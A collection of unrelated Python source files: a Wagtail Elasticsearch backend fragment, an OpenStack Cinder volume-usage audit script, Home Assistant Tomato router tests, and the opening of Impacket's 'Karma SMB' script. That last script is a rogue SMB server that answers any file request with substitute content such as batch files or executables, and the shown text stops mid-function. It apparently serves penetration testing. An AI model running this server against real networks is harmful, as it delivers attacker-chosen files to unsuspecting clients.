self.timeout = params.pop('TIMEOUT', 10)
if params.pop('ATOMIC_REBUILD', False):
self.rebuilder_class = self.atomic_rebuilder_class
else:
self.rebuilder_class = self.basic_rebuilder_class
# If HOSTS is not set, convert URLS setting to HOSTS
es_urls = params.pop('URLS', ['http://localhost:9200'])
if self.hosts is None:
self.hosts = []
for url in es_urls:
parsed_url = urlparse(url)
use_ssl = parsed_url.scheme == 'https'
port = parsed_url.port or (443 if use_ssl else 80)
http_auth = None
if parsed_url.username is not None and parsed_url.password is not None:
http_auth = (parsed_url.username, parsed_url.password)
self.hosts.append({
'host': parsed_url.hostname,
'port': port,
'url_prefix': parsed_url.path,
'use_ssl': use_ssl,
'verify_certs': use_ssl,
'http_auth': http_auth,
})
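# Illustration only: a (hypothetical) entry
# URLS=['https://user:secret@es.example.com:9200/prefix'] becomes
# HOSTS=[{'host': 'es.example.com', 'port': 9200, 'url_prefix': '/prefix',
#         'use_ssl': True, 'verify_certs': True,
#         'http_auth': ('user', 'secret')}].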
# Get Elasticsearch interface
# Any remaining params are passed into the Elasticsearch constructor
self.es = Elasticsearch(
hosts=self.hosts,
timeout=self.timeout,
**params)
def get_index_for_model(self, model):
return self.index_class(self, self.index_name)
def get_index(self):
return self.index_class(self, self.index_name)
def get_rebuilder(self):
return self.rebuilder_class(self.get_index())
def reset_index(self):
# Use the rebuilder to reset the index
self.get_rebuilder().reset_index()
def add_type(self, model):
self.get_index_for_model(model).add_model(model)
def refresh_index(self):
self.get_index().refresh()
def add(self, obj):
self.get_index_for_model(type(obj)).add_item(obj)
def add_bulk(self, model, obj_list):
self.get_index_for_model(model).add_items(model, obj_list)
def delete(self, obj):
self.get_index_for_model(type(obj)).delete_item(obj)
SearchBackend = ElasticsearchSearchBackend
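# A minimal configuration sketch (assuming Wagtail's standard
# WAGTAILSEARCH_BACKENDS setting; values are illustrative):
#
#   WAGTAILSEARCH_BACKENDS = {
#       'default': {
#           'BACKEND': 'path.to.this.module',
#           'URLS': ['http://localhost:9200'],
#           'INDEX': 'wagtail',
#           'TIMEOUT': 10,
#           'ATOMIC_REBUILD': True,
#       },
#   }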
|
|
#!/usr/bin/env python
# Copyright (c) 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Cron script to generate usage notifications for volumes existing during
the audit period.
Together with the notifications generated by volumes
create/delete/resize, over that time period, this allows an external
system consuming usage notification feeds to calculate volume usage
for each tenant.
Time periods are specified as 'hour', 'month', 'day' or 'year'
hour = previous hour. If run at 9:07am, it will generate usage for 8-9am.
month = previous month. If the script is run April 1, it will generate
usages for March 1 through March 31.
day = previous day. If run on July 4th, it generates usages for July 3rd.
year = previous year. If run on Jan 1, it generates usages for
Jan 1 through Dec 31 of the previous year.
"""
from __future__ import print_function
import datetime
import sys
import warnings
warnings.simplefilter('once', DeprecationWarning)
from oslo_config import cfg
from oslo_log import log as logging
from cinder import i18n
i18n.enable_lazy()
from cinder import context
from cinder import db
from cinder.i18n import _, _LE
from cinder import objects
from cinder import rpc
from cinder import utils
from cinder import version
import cinder.volume.utils
CONF = cfg.CONF
script_opts = [
cfg.StrOpt('start_time',
default=None,
help="If this option is specified then the start time "
"specified is used instead of the start time of the "
"last completed audit period."),
cfg.StrOpt('end_time',
default=None,
help="If this option is specified then the end time "
"specified is used instead of the end time of the "
"last completed audit period."),
cfg.BoolOpt('send_actions',
default=False,
help="Send the volume and snapshot create and delete "
"notifications generated in the specified period."),
]
CONF.register_cli_opts(script_opts)
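# Example invocation (illustrative; the installed script name may differ):
#   cinder-volume-usage-audit --start_time '2016-03-01 00:00:00' \
#       --end_time '2016-04-01 00:00:00' --send_actions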
def main():
admin_context = context.get_admin_context()
CONF(sys.argv[1:], project='cinder',
version=version.version_string())
logging.setup(CONF, "cinder")
LOG = logging.getLogger("cinder")
rpc.init(CONF)
begin, end = utils.last_completed_audit_period()
if CONF.start_time:
begin = datetime.datetime.strptime(CONF.start_time,
"%Y-%m-%d %H:%M:%S")
if CONF.end_time:
end = datetime.datetime.strptime(CONF.end_time,
"%Y-%m-%d %H:%M:%S")
if not end > begin:
msg = _("The end time (%(end)s) must be after the start "
"time (%(start)s).") % {'start': begin,
'end': end}
LOG.error(msg)
sys.exit(-1)
LOG.debug("Starting volume usage audit")
msg = _("Creating usages for %(begin_period)s until %(end_period)s")
LOG.debug(msg, {"begin_period": str(begin), "end_period": str(end)})
extra_info = {
'audit_period_beginning': str(begin),
'audit_period_ending': str(end),
}
volumes = db.volume_get_active_by_window(admin_context,
begin,
end)
LOG.debug("Found %d volumes"), len(volumes)
for volume_ref in volumes:
try:
LOG.debug("Send exists notification for <volume_id: "
"%(volume_id)s> <project_id %(project_id)s> "
"<%(extra_info)s>",
{'volume_id': volume_ref.id,
'project_id': volume_ref.project_id,
'extra_info': extra_info})
cinder.volume.utils.notify_about_volume_usage(
admin_context,
volume_ref,
'exists', extra_usage_info=extra_info)
except Exception as exc_msg:
LOG.exception(_LE("Exists volume notification failed: %s"),
exc_msg, resource=volume_ref)
if (CONF.send_actions and
volume_ref.created_at > begin and
volume_ref.created_at < end):
try:
local_extra_info = {
'audit_period_beginning': str(volume_ref.created_at),
'audit_period_ending': str(volume_ref.created_at),
}
LOG.debug("Send create notification for "
"<volume_id: %(volume_id)s> "
"<project_id %(project_id)s> <%(extra_info)s>",
{'volume_id': volume_ref.id,
'project_id': volume_ref.project_id,
'extra_info': local_extra_info})
cinder.volume.utils.notify_about_volume_usage(
admin_context,
volume_ref,
'create.start', extra_usage_info=local_extra_info)
cinder.volume.utils.notify_about_volume_usage(
admin_context,
volume_ref,
'create.end', extra_usage_info=local_extra_info)
except Exception as exc_msg:
LOG.exception(_LE("Create volume notification failed: %s"),
exc_msg, resource=volume_ref)
if (CONF.send_actions and volume_ref.deleted_at and
volume_ref.deleted_at > begin and
volume_ref.deleted_at < end):
try:
local_extra_info = {
'audit_period_beginning': str(volume_ref.deleted_at),
'audit_period_ending': str(volume_ref.deleted_at),
}
LOG.debug("Send delete notification for "
"<volume_id: %(volume_id)s> "
"<project_id %(project_id)s> <%(extra_info)s>",
{'volume_id': volume_ref.id,
'project_id': volume_ref.project_id,
'extra_info': local_extra_info})
cinder.volume.utils.notify_about_volume_usage(
admin_context,
volume_ref,
'delete.start', extra_usage_info=local_extra_info)
cinder.volume.utils.notify_about_volume_usage(
admin_context,
volume_ref,
'delete.end', extra_usage_info=local_extra_info)
except Exception as exc_msg:
LOG.exception(_LE("Delete volume notification failed: %s"),
exc_msg, resource=volume_ref)
snapshots = objects.SnapshotList.get_active_by_window(admin_context,
begin, end)
LOG.debug("Found %d snapshots"), len(snapshots)
for snapshot_ref in snapshots:
try:
LOG.debug("Send notification for <snapshot_id: %(snapshot_id)s> "
"<project_id %(project_id)s> <%(extra_info)s>",
{'snapshot_id': snapshot_ref.id,
'project_id': snapshot_ref.project_id,
'extra_info': extra_info})
cinder.volume.utils.notify_about_snapshot_usage(admin_context,
snapshot_ref,
'exists',
extra_info)
except Exception as exc_msg:
LOG.exception(_LE("Exists snapshot notification failed: %s"),
exc_msg, resource=snapshot_ref)
if (CONF.send_actions and
snapshot_ref.created_at > begin and
snapshot_ref.created_at < end):
try:
local_extra_info = {
'audit_period_beginning': str(snapshot_ref.created_at),
'audit_period_ending': str(snapshot_ref.created_at),
}
LOG.debug("Send create notification for "
"<snapshot_id: %(snapshot_id)s> "
"<project_id %(project_id)s> <%(extra_info)s>",
{'snapshot_id': snapshot_ref.id,
'project_id': snapshot_ref.project_id,
'extra_info': local_extra_info})
cinder.volume.utils.notify_about_snapshot_usage(
admin_context,
snapshot_ref,
'create.start', extra_usage_info=local_extra_info)
cinder.volume.utils.notify_about_snapshot_usage(
admin_context,
snapshot_ref,
'create.end', extra_usage_info=local_extra_info)
except Exception as exc_msg:
LOG.exception(_LE("Create snapshot notification failed: %s"),
exc_msg, resource=snapshot_ref)
if (CONF.send_actions and snapshot_ref.deleted_at and
snapshot_ref.deleted_at > begin and
snapshot_ref.deleted_at < end):
try:
local_extra_info = {
'audit_period_beginning': str(snapshot_ref.deleted_at),
'audit_period_ending': str(snapshot_ref.deleted_at),
}
LOG.debug("Send delete notification for "
"<snapshot_id: %(snapshot_id)s> "
"<project_id %(project_id)s> <%(extra_info)s>",
{'snapshot_id': snapshot_ref.id,
'project_id': snapshot_ref.project_id,
'extra_info': local_extra_info})
cinder.volume.utils.notify_about_snapshot_usage(
admin_context,
snapshot_ref,
'delete.start', extra_usage_info=local_extra_info)
cinder.volume.utils.notify_about_snapshot_usage(
admin_context,
snapshot_ref,
'delete.end', extra_usage_info=local_extra_info)
except Exception as exc_msg:
LOG.exception(_LE("Delete snapshot notification failed: %s"),
exc_msg, resource=snapshot_ref)
LOG.debug("Volume usage audit completed")
|
|
"""The tests for the Tomato device tracker platform."""
from unittest import mock
import pytest
import requests
import requests_mock
import voluptuous as vol
from homeassistant.components.device_tracker import DOMAIN, tomato as tomato
from homeassistant.const import (CONF_HOST, CONF_USERNAME, CONF_PASSWORD,
CONF_PORT, CONF_SSL, CONF_PLATFORM,
CONF_VERIFY_SSL)
def mock_session_response(*args, **kwargs):
"""Mock data generation for session response."""
class MockSessionResponse:
def __init__(self, text, status_code):
self.text = text
self.status_code = status_code
# Username: foo
# Password: bar
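# base64('foo:bar') == 'Zm9vOmJhcg=='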
if args[0].headers['Authorization'] != 'Basic Zm9vOmJhcg==':
return MockSessionResponse(None, 401)
if "gimmie_bad_data" in args[0].body:
return MockSessionResponse('This shouldn\'t (wldev = be here.;', 200)
if "gimmie_good_data" in args[0].body:
return MockSessionResponse(
"wldev = [ ['eth1','F4:F5:D8:AA:AA:AA',"
"-42,5500,1000,7043,0],['eth1','58:EF:68:00:00:00',"
"-42,5500,1000,7043,0]];\n"
"dhcpd_lease = [ ['chromecast','172.10.10.5','F4:F5:D8:AA:AA:AA',"
"'0 days, 16:17:08'],['wemo','172.10.10.6','58:EF:68:00:00:00',"
"'0 days, 12:09:08']];", 200)
return MockSessionResponse(None, 200)
@pytest.fixture
def mock_exception_logger():
"""Mock pyunifi."""
with mock.patch('homeassistant.components.device_tracker'
'.tomato._LOGGER.exception') as mock_exception_logger:
yield mock_exception_logger
@pytest.fixture
def mock_session_send():
"""Mock requests.Session().send."""
with mock.patch('requests.Session.send') as mock_session_send:
yield mock_session_send
def test_config_missing_optional_params(hass, mock_session_send):
"""Test the setup without optional parameters."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'password',
tomato.CONF_HTTP_ID: '1234567890'
})
}
result = tomato.get_scanner(hass, config)
assert result.req.url == "http://tomato-router:80/update.cgi"
assert result.req.headers == {
'Content-Length': '32',
'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'Basic Zm9vOnBhc3N3b3Jk'
}
assert "_http_id=1234567890" in result.req.body
assert "exec=devlist" in result.req.body
@mock.patch('os.access', return_value=True)
@mock.patch('os.path.isfile', mock.Mock(return_value=True))
def test_config_default_nonssl_port(hass, mock_session_send):
"""Test the setup without a default port set without ssl enabled."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'password',
tomato.CONF_HTTP_ID: '1234567890'
})
}
result = tomato.get_scanner(hass, config)
assert result.req.url == "http://tomato-router:80/update.cgi"
@mock.patch('os.access', return_value=True)
@mock.patch('os.path.isfile', mock.Mock(return_value=True))
def test_config_default_ssl_port(hass, mock_session_send):
"""Test the setup without a default port set with ssl enabled."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_SSL: True,
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'password',
tomato.CONF_HTTP_ID: '1234567890'
})
}
result = tomato.get_scanner(hass, config)
assert result.req.url == "https://tomato-router:443/update.cgi"
@mock.patch('os.access', return_value=True)
@mock.patch('os.path.isfile', mock.Mock(return_value=True))
def test_config_verify_ssl_but_no_ssl_enabled(hass, mock_session_send):
"""Test the setup with a string with ssl_verify but ssl not enabled."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_PORT: 1234,
CONF_SSL: False,
CONF_VERIFY_SSL: "/tmp/tomato.crt",
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'password',
tomato.CONF_HTTP_ID: '1234567890'
})
}
result = tomato.get_scanner(hass, config)
assert result.req.url == "http://tomato-router:1234/update.cgi"
assert result.req.headers == {
'Content-Length': '32',
'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'Basic Zm9vOnBhc3N3b3Jk'
}
assert "_http_id=1234567890" in result.req.body
assert "exec=devlist" in result.req.body
assert mock_session_send.call_count == 1
assert mock_session_send.mock_calls[0] == \
mock.call(result.req, timeout=3)
@mock.patch('os.access', return_value=True)
@mock.patch('os.path.isfile', mock.Mock(return_value=True))
def test_config_valid_verify_ssl_path(hass, mock_session_send):
"""Test the setup with a string for ssl_verify.
Representing the absolute path to a CA certificate bundle.
"""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_PORT: 1234,
CONF_SSL: True,
CONF_VERIFY_SSL: "/tmp/tomato.crt",
CONF_USERNAME: 'bar',
CONF_PASSWORD: 'foo',
tomato.CONF_HTTP_ID: '0987654321'
})
}
result = tomato.get_scanner(hass, config)
assert result.req.url == "https://tomato-router:1234/update.cgi"
assert result.req.headers == {
'Content-Length': '32',
'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'Basic YmFyOmZvbw=='
}
assert "_http_id=0987654321" in result.req.body
assert "exec=devlist" in result.req.body
assert mock_session_send.call_count == 1
assert mock_session_send.mock_calls[0] == \
mock.call(result.req, timeout=3, verify="/tmp/tomato.crt")
def test_config_valid_verify_ssl_bool(hass, mock_session_send):
"""Test the setup with a bool for ssl_verify."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_PORT: 1234,
CONF_SSL: True,
CONF_VERIFY_SSL: "False",
CONF_USERNAME: 'bar',
CONF_PASSWORD: 'foo',
tomato.CONF_HTTP_ID: '0987654321'
})
}
result = tomato.get_scanner(hass, config)
assert result.req.url == "https://tomato-router:1234/update.cgi"
assert result.req.headers == {
'Content-Length': '32',
'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'Basic YmFyOmZvbw=='
}
assert "_http_id=0987654321" in result.req.body
assert "exec=devlist" in result.req.body
assert mock_session_send.call_count == 1
assert mock_session_send.mock_calls[0] == \
mock.call(result.req, timeout=3, verify=False)
def test_config_errors():
"""Test for configuration errors."""
with pytest.raises(vol.Invalid):
tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
# No Host,
CONF_PORT: 1234,
CONF_SSL: True,
CONF_VERIFY_SSL: "False",
CONF_USERNAME: 'bar',
CONF_PASSWORD: 'foo',
tomato.CONF_HTTP_ID: '0987654321'
})
with pytest.raises(vol.Invalid):
tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_PORT: -123456789, # Bad Port
CONF_SSL: True,
CONF_VERIFY_SSL: "False",
CONF_USERNAME: 'bar',
CONF_PASSWORD: 'foo',
tomato.CONF_HTTP_ID: '0987654321'
})
with pytest.raises(vol.Invalid):
tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_PORT: 1234,
CONF_SSL: True,
CONF_VERIFY_SSL: "False",
# No Username
CONF_PASSWORD: 'foo',
tomato.CONF_HTTP_ID: '0987654321'
})
with pytest.raises(vol.Invalid):
tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_PORT: 1234,
CONF_SSL: True,
CONF_VERIFY_SSL: "False",
CONF_USERNAME: 'bar',
# No Password
tomato.CONF_HTTP_ID: '0987654321'
})
with pytest.raises(vol.Invalid):
tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_PORT: 1234,
CONF_SSL: True,
CONF_VERIFY_SSL: "False",
CONF_USERNAME: 'bar',
CONF_PASSWORD: 'foo',
# No HTTP_ID
})
@mock.patch('requests.Session.send', side_effect=mock_session_response)
def test_config_bad_credentials(hass, mock_exception_logger):
"""Test the setup with bad credentials."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_USERNAME: 'i_am',
CONF_PASSWORD: 'an_imposter',
tomato.CONF_HTTP_ID: '1234'
})
}
tomato.get_scanner(hass, config)
assert mock_exception_logger.call_count == 1
assert mock_exception_logger.mock_calls[0] == \
mock.call("Failed to authenticate, "
"please check your username and password")
@mock.patch('requests.Session.send', side_effect=mock_session_response)
def test_bad_response(hass, mock_exception_logger):
"""Test the setup with bad response from router."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'bar',
tomato.CONF_HTTP_ID: 'gimmie_bad_data'
})
}
tomato.get_scanner(hass, config)
assert mock_exception_logger.call_count == 1
assert mock_exception_logger.mock_calls[0] == \
mock.call("Failed to parse response from router")
@mock.patch('requests.Session.send', side_effect=mock_session_response)
def test_scan_devices(hass, mock_exception_logger):
"""Test scanning for new devices."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'bar',
tomato.CONF_HTTP_ID: 'gimmie_good_data'
})
}
scanner = tomato.get_scanner(hass, config)
assert scanner.scan_devices() == ['F4:F5:D8:AA:AA:AA', '58:EF:68:00:00:00']
@mock.patch('requests.Session.send', side_effect=mock_session_response)
def test_bad_connection(hass, mock_exception_logger):
"""Test the router with a connection error."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'bar',
tomato.CONF_HTTP_ID: 'gimmie_good_data'
})
}
with requests_mock.Mocker() as adapter:
adapter.register_uri('POST', 'http://tomato-router:80/update.cgi',
exc=requests.exceptions.ConnectionError)
tomato.get_scanner(hass, config)
assert mock_exception_logger.call_count == 1
assert mock_exception_logger.mock_calls[0] == \
mock.call("Failed to connect to the router "
"or invalid http_id supplied")
@mock.patch('requests.Session.send', side_effect=mock_session_response)
def test_router_timeout(hass, mock_exception_logger):
"""Test the router with a timeout error."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'bar',
tomato.CONF_HTTP_ID: 'gimmie_good_data'
})
}
with requests_mock.Mocker() as adapter:
adapter.register_uri('POST', 'http://tomato-router:80/update.cgi',
exc=requests.exceptions.Timeout)
tomato.get_scanner(hass, config)
assert mock_exception_logger.call_count == 1
assert mock_exception_logger.mock_calls[0] == \
mock.call("Connection to the router timed out")
@mock.patch('requests.Session.send', side_effect=mock_session_response)
def test_get_device_name(hass, mock_exception_logger):
"""Test getting device names."""
config = {
DOMAIN: tomato.PLATFORM_SCHEMA({
CONF_PLATFORM: tomato.DOMAIN,
CONF_HOST: 'tomato-router',
CONF_USERNAME: 'foo',
CONF_PASSWORD: 'bar',
tomato.CONF_HTTP_ID: 'gimmie_good_data'
})
}
scanner = tomato.get_scanner(hass, config)
assert scanner.get_device_name('F4:F5:D8:AA:AA:AA') == 'chromecast'
assert scanner.get_device_name('58:EF:68:00:00:00') == 'wemo'
assert scanner.get_device_name('AA:BB:CC:00:00:00') is None
|
|
#!/usr/bin/env python
# Copyright (c) 2016 CORE Security Technologies
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Karma SMB
#
# Author:
# Alberto Solino (@agsolino)
# Original idea by @mubix
#
# Description:
# The idea of this script is to answer any file read request
# with a set of predefined contents based on the extension
# asked, regardless of the sharename and/or path.
# When executing this script without a config file, the contents of
# the file given as <pathname> will be sent for every request.
# If a config file is specified, format should be this way:
# <extension> = <pathname>
# for example:
# bat = /tmp/batchfile
# com = /tmp/comfile
# exe = /tmp/exefile
#
# The SMB2 support works with a caveat. If two different
# filenames at the same share are requested, the first
# one will work and the second one will not work if the request
# is performed right away. This seems related to the
# QUERY_DIRECTORY request, where we return the files available.
# In the first try, we return the file that was asked to open.
# In the second try, the client will NOT ask for another
# QUERY_DIRECTORY but will use the cached one. This time the new file
# is not there, so the client assumes it doesn't exist.
# After a few seconds the client cache appears to be cleared and
# the operation works again. Further research is needed on how to
# keep this from happening.
#
# SMB1 seems to be working fine on that scenario.
#
# ToDo:
# [ ] A lot of testing needed under different OSes.
# I'm still not sure how reliable this approach is.
# [ ] Add support for other SMB read commands. Right now just
# covering SMB_COM_NT_CREATE_ANDX
# [ ] Disable write request, now if the client tries to copy
# a file back to us, it will overwrite the files we're
# hosting. *CAREFUL!!!*
#
import sys
import os
import argparse
import logging
import ntpath
import ConfigParser
from threading import Thread
from impacket.examples import logger
from impacket import smbserver, smb, version
import impacket.smb3structs as smb2
from impacket.smb import FILE_OVERWRITE, FILE_OVERWRITE_IF, FILE_WRITE_DATA, FILE_APPEND_DATA, GENERIC_WRITE
from impacket.nt_errors import STATUS_USER_SESSION_DELETED, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NO_MORE_FILES, \
STATUS_OBJECT_PATH_NOT_FOUND
from impacket.smbserver import SRVSServer, decodeSMBString, findFirst2, STATUS_SMB_BAD_TID, encodeSMBString, \
getFileTime, queryPathInformation
class KarmaSMBServer(Thread):
def __init__(self, smb2Support = False):
Thread.__init__(self)
self.server = 0
self.defaultFile = None
self.extensions = {}
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','Logon server share')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
# NETLOGON always needed
smbConfig.add_section('NETLOGON')
smbConfig.set('NETLOGON','comment','Logon server share')
smbConfig.set('NETLOGON','read only','no')
smbConfig.set('NETLOGON','share type','0')
smbConfig.set('NETLOGON','path','')
# SYSVOL always needed
smbConfig.add_section('SYSVOL')
smbConfig.set('SYSVOL','comment','')
smbConfig.set('SYSVOL','read only','no')
smbConfig.set('SYSVOL','share type','0')
smbConfig.set('SYSVOL','path','')
if smb2Support:
smbConfig.set("global", "SMB2Support", "True")
self.server = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
self.server.processConfigFile()
# Unregistering some dangerous and unwanted commands
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_CREATE_DIRECTORY)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE_DIRECTORY)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_RENAME)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE_ANDX)
self.server.unregisterSmb2Command(smb2.SMB2_WRITE)
self.origsmbComNtCreateAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX, self.smbComNtCreateAndX)
self.origsmbComTreeConnectAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX, self.smbComTreeConnectAndX)
self.origQueryPathInformation = self.server.hookTransaction2(smb.SMB.TRANS2_QUERY_PATH_INFORMATION, self.queryPathInformation)
self.origFindFirst2 = self.server.hookTransaction2(smb.SMB.TRANS2_FIND_FIRST2, self.findFirst2)
# And the same for SMB2
self.origsmb2TreeConnect = self.server.hookSmb2Command(smb2.SMB2_TREE_CONNECT, self.smb2TreeConnect)
self.origsmb2Create = self.server.hookSmb2Command(smb2.SMB2_CREATE, self.smb2Create)
self.origsmb2QueryDirectory = self.server.hookSmb2Command(smb2.SMB2_QUERY_DIRECTORY, self.smb2QueryDirectory)
self.origsmb2Read = self.server.hookSmb2Command(smb2.SMB2_READ, self.smb2Read)
self.origsmb2Close = self.server.hookSmb2Command(smb2.SMB2_CLOSE, self.smb2Close)
# Now we have to register the MS-SRVS server. This is especially important
# for Windows 7+ and Mavericks clients, since they WON'T (especially OSX)
# ask for shares using MS-RAP.
self.__srvsServer = SRVSServer()
self.__srvsServer.daemon = True
self.server.registerNamedPipe('srvsvc',('127.0.0.1',self.__srvsServer.getListenPort()))
def findFirst2(self, connId, smbServer, recvPacket, parameters, data, maxDataCount):
connData = smbServer.getConnectionData(connId)
respSetup = ''
respParameters = ''
respData = ''
findFirst2Parameters = smb.SMBFindFirst2_Parameters( recvPacket['Flags2'], data = parameters)
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],findFirst2Parameters['FileName']).replace('\\','/'))
origFileName = os.path.basename(origPathName)
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
if connData['ConnectedShares'].has_key(recvPacket['Tid']):
path = connData['ConnectedShares'][recvPacket['Tid']]['path']
# 2. We call the normal findFirst2 call, but with our targetFile
searchResult, searchCount, errorCode = findFirst2(path,
targetFile,
findFirst2Parameters['InformationLevel'],
findFirst2Parameters['SearchAttributes'] )
respParameters = smb.SMBFindFirst2Response_Parameters()
endOfSearch = 1
sid = 0x80 # default SID
searchCount = 0
totalData = 0
for i in enumerate(searchResult):
#i[1].dump()
try:
# 3. And we restore the original filename requested ;)
i[1]['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = origFileName)
except:
pass
data = i[1].getData()
lenData = len(data)
if (totalData+lenData) >= maxDataCount or (i[0]+1) > findFirst2Parameters['SearchCount']:
# We gotta stop here and continue on a find_next2
endOfSearch = 0
# Simple way to generate a fid
if len(connData['SIDs']) == 0:
sid = 1
else:
sid = connData['SIDs'].keys()[-1] + 1
# Store the remaining search results in the ConnData SID
connData['SIDs'][sid] = searchResult[i[0]:]
respParameters['LastNameOffset'] = totalData
break
else:
searchCount +=1
respData += data
totalData += lenData
respParameters['SID'] = sid
respParameters['EndOfSearch'] = endOfSearch
respParameters['SearchCount'] = searchCount
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
def smbComNtCreateAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
ntCreateAndXParameters = smb.SMBNtCreateAndX_Parameters(SMBCommand['Parameters'])
ntCreateAndXData = smb.SMBNtCreateAndX_Data( flags = recvPacket['Flags2'], data = SMBCommand['Data'])
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
#ntCreateAndXParameters.dump()
# Let's try to avoid allowing write requests from the client back to us
# not 100% bulletproof, plus also the client might be using other SMB
# calls (e.g. SMB_COM_WRITE)
createOptions = ntCreateAndXParameters['CreateOptions']
if createOptions & smb.FILE_DELETE_ON_CLOSE == smb.FILE_DELETE_ON_CLOSE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE == FILE_OVERWRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE_IF == FILE_OVERWRITE_IF:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.FILE_WRITE_DATA == FILE_WRITE_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.FILE_APPEND_DATA == FILE_APPEND_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.GENERIC_WRITE == GENERIC_WRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & 0x10000 == 0x10000:
errorCode = STATUS_ACCESS_DENIED
else:
errorCode = STATUS_SUCCESS
if errorCode == STATUS_ACCESS_DENIED:
return [respSMBCommand], None, errorCode
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],ntCreateAndXData['FileName']).replace('\\','/'))
_, origPathNameExtension = os.path.splitext(origPathName)
